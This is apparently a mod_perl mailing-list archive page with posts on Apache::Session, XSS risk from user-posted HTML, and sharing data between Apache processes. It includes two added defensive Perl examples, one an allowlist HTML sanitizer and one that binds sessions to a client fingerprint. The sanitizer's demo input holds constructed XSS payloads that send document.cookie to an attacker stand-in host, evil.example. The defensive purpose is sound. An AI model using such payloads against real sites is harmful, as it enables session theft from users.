Re: Apache::Session
Hi, All

What have you used to strip out that stuff? I've reviewed HTML::StripScripts, but it seems to be very slow. I've also considered HTML::Filter to do that, but I'm also afraid that HTML::Parser is not the fastest thing on the earth, even though it will be invoked once during initial submission. Could you also advise on this safe subset of HTML you use?

Sincerely,
Alex

Patrick Galbraith wrote:
> Strip out stuff that could be problematic. This is what we did with Slash. We strip out javascript or any tag that can be problematic, or be used even to break the layout of the page. It'll make your life much easier ;) Take this from someone who coded tons of features to ward off trolls!
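An added example of the approach Patrick describes, written for this page and not taken from Slash, HTML::StripScripts or anyone on the thread: an allowlist filter on top of HTML::Parser. Every tag and attribute that is not explicitly listed is dropped (so no on* handlers, no style, no src), URL attributes are kept only when they start with http(s):// or / (which also rejects entity-encoded spellings of javascript:, because the parser decodes attribute values before the handler sees them), script and style elements vanish with their contents, and tags the poster left open are closed at the end so a post cannot break the page layout. The allowlist itself and the sample post are assumptions constructed for the demo.

```perl
#!/usr/bin/perl
# Added example, not code from Slash or from the thread: reduce posted HTML
# to an allowlist of tags and attributes with HTML::Parser. The allowlist
# itself is an assumption; pick whatever subset your layout tolerates.
use strict;
use warnings;
use HTML::Parser;
use HTML::Entities qw(encode_entities);

# tag => { attribute => 1 }; anything not listed is dropped. No on* handlers,
# no style, no src: those are where script usually hides.
my %ALLOW = (
    p => {}, br => {}, b => {}, i => {}, em => {}, strong => {},
    a => { href => 1 },
);
my %URL_ATTR = (href => 1);

sub sanitize {
    my ($html) = @_;
    my $out  = '';
    my @open = ();                      # stack of allowed tags still open

    my $p = HTML::Parser->new(
        api_version => 3,
        start_h => [ sub {
            my ($tag, $attr) = @_;
            my $ok = $ALLOW{$tag} or return;        # unknown tag: dropped
            my $s = "<$tag";
            for my $name (sort keys %$attr) {
                next unless $ok->{$name};
                my $val = $attr->{$name};            # already entity-decoded by the parser
                # URL attributes: only http(s) or site-relative. This rejects
                # javascript:, data:, vbscript: and their entity-encoded spellings.
                next if $URL_ATTR{$name} && $val !~ m{^\s*(?:https?://|/)}i;
                $s .= qq{ $name="} . encode_entities($val, '<>&"') . '"';
            }
            $out .= "$s>";
            push @open, $tag unless $tag eq 'br';
        }, 'tagname, attr' ],
        end_h => [ sub {
            my ($tag) = @_;
            return unless $ALLOW{$tag};
            my ($i) = grep { $open[$_] eq $tag } reverse 0 .. $#open;
            return unless defined $i;               # stray close tag: dropped
            $out .= '</' . pop(@open) . '>' while @open > $i;   # close inner tags too
        }, 'tagname' ],
        text_h => [ sub {
            my ($text) = @_;
            $out .= encode_entities($text, '<>&"'); # re-escape decoded text
        }, 'dtext' ],
        # no comment_h/default_h: comments, doctype, processing instructions vanish
    );
    $p->ignore_elements(qw(script style));          # drop their content, not just the tags
    $p->parse($html);
    $p->eof;
    $out .= '</' . pop(@open) . '>' while @open;    # close what the poster left open
    return $out;
}

# Constructed hostile post for the demo (not a real message from the list).
my $posted = <<'HTML';
<p onmouseover="alert(document.cookie)">Hi <b>all</p>
<a href="&#106;avascript:location='http://evil.example/?'+document.cookie">click</a>
<a href="http://example.com/">fine</a>
<script>location='http://evil.example/'+document.cookie</script>
<img src="x" onerror="alert(1)">
HTML
print sanitize($posted);
```

Run against the constructed post this prints `<p>Hi <b>all</b></p>`, `<a>click</a>` (the javascript: href is gone) and `<a href="http://example.com/">fine</a>`; the script element, the img with its onerror handler and the onmouseover attribute do not appear at all. Because the filter runs once at submission time, as noted above, the parser's cost is paid per post rather than per page view. The allowlist is deliberately short: every additional tag or attribute is a new thing to reason about, and an attribute that takes a URL (href, src, background) always needs the scheme check.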
Apache::Session
Hi, All

Sorry, this post might be out of scope for this particular list, but still... don't punch me heavily :) I just think the people here might have met this problem while deploying big public applications.

I use Apache::Session to identify logged-in users. However, the users are allowed to post HTML (obviously with JavaScript) messages viewable by others. That could create an XSS vulnerability and allow stealing the sessions (cookies) of other users.

Is it possible to uniquely identify the user by some attributes? The only thing I consider now is IP, but what about proxies and NATs? The User-Agent string could also be stolen via JavaScript. That means I tend to make stolen session ids non-reusable.

Any thoughts?

Sincerely,
Aleksandr Guidrevitch
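One way to make a stolen session id non-reusable, as an added example written for this page rather than code from the original post or from Apache::Session itself: at login the session records a keyed hash of the client's /24 IPv4 prefix and User-Agent, every later lookup recomputes it, and a mismatch destroys the session instead of merely refusing the request, so the legitimate user is sent back to the login page and the thief gets nothing. The choice of /24 prefix, the IPv4-only parsing, the `$SECRET` value and the temporary directories are all assumptions made for the demo; the example needs Apache::Session::File and Digest::SHA installed.

```perl
#!/usr/bin/perl
# Added example (not from the original thread or from Apache::Session):
# bind an Apache::Session session to a fingerprint of the client so that
# a stolen session id is not reusable from elsewhere. Assumes
# Apache::Session::File and Digest::SHA are installed.
use strict;
use warnings;
use Apache::Session::File;
use Digest::SHA qw(sha256_hex);
use File::Temp qw(tempdir);

my $dir  = tempdir(CLEANUP => 1);            # session store (example only)
my $lock = tempdir(CLEANUP => 1);            # lock directory (example only)
my %opts = (Directory => $dir, LockDirectory => $lock);

# Hypothetical server-side secret: without it, anyone who knows the IP
# prefix and User-Agent could compute the fingerprint themselves.
my $SECRET = 'change-me-per-deployment';

# Fingerprint = first three octets of the IPv4 address (tolerates NAT or
# proxy pools that only rotate the last octet; an assumption, tune to your
# users) plus the User-Agent string, all hashed with the secret.
sub fingerprint {
    my ($ip, $ua) = @_;
    my ($prefix) = $ip =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3})\.\d{1,3}$/
        or die "unexpected address format: $ip";
    return sha256_hex(join "\0", $SECRET, $prefix, $ua);
}

# Login: create a fresh session (undef id => Apache::Session generates one)
# and record who it belongs to and where it was created from.
sub login {
    my ($user, $ip, $ua) = @_;
    tie my %s, 'Apache::Session::File', undef, \%opts;
    $s{user} = $user;
    $s{fp}   = fingerprint($ip, $ua);
    my $id = $s{_session_id};
    untie %s;
    return $id;     # goes into the Set-Cookie header; mark it HttpOnly
}

# Lookup: returns the user name for a presented id, or undef if the id is
# unknown or the fingerprint does not match. On a mismatch the session is
# deleted, so the id is dead for the thief and the owner alike.
sub lookup {
    my ($id, $ip, $ua) = @_;
    my %s;
    eval { tie %s, 'Apache::Session::File', $id, \%opts; 1 } or return undef;
    if ($s{fp} ne fingerprint($ip, $ua)) {
        tied(%s)->delete;               # invalidate rather than just refuse
        untie %s;
        return undef;
    }
    my $user = $s{user};
    untie %s;
    return $user;
}

# Demo with constructed addresses and User-Agent (not real traffic).
sub show { defined $_[0] ? $_[0] : 'denied' }
my $ua = 'Mozilla/5.0 (example)';
my $id = login('alex', '10.0.0.5', $ua);
print 'owner, same /24:   ', show(lookup($id, '10.0.0.9',  $ua)), "\n";  # alex
print 'thief, other net:  ', show(lookup($id, '192.0.2.7', $ua)), "\n";  # denied, session deleted
print 'owner, afterwards: ', show(lookup($id, '10.0.0.5',  $ua)), "\n";  # denied, must log in again
```

Two caveats the thread already points at. The User-Agent part only stops a lazy attacker, since a script that reads document.cookie can read navigator.userAgent just as easily; the IP prefix is the part an attacker outside the victim's network cannot supply. And any binding on network attributes produces false logouts for users behind rotating proxy pools or mobile carriers, so a mismatch has to mean "please log in again", never a silent error. Marking the cookie HttpOnly (not mentioned in the thread) keeps it out of document.cookie in browsers that honour the attribute and removes the most direct theft path, but it is a complement to this check, not a replacement.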
Re: [OT] About XML and Petal (was Re: templating system opinions(axkit?))
Hi, All

Maybe I'm a bit late here... But is there any sense in artificial XML templating languages since there is XSLT? Just wondering whether there are cons other than the long learning curve and performance issues?

Alex Gidrevich
Application design patterns
Hi, All

Are there some common application design patterns using mod_perl + TT2? Any links would be greatly appreciated.

Sincerely,
Alex
Sharing objects
Hi, All again :)

That's not my last post :) What are common patterns of sharing data between Apache processes? For example, I'd like to share some indexes. Also, I'd like to avoid a complex synchronization process (currently IPC::Shareable seems to be the right thing).

Sincerely,
Alex
Re: Sharing objects
Hello Perrin,

> No, IPC::Shareable is slow. You are better off with one of these:
> MLDBM::Sync
> Cache::Mmap
> BerkeleyDB (with native locking)
> Cache::FileCache
> IPC::MM

Actually I think I'll use Cache::FileCache as the storage backend. But I need the cache keys to be sorted by various criteria. I strive to avoid re-reading the Cache::* keys and sorting them each time, and instead to somehow share the sorted lists between Apache processes (as they could be huge). However, having an extra key like keys_sorted_by_* in Cache::FileCache will probably solve the problem.

Thanks,
Alex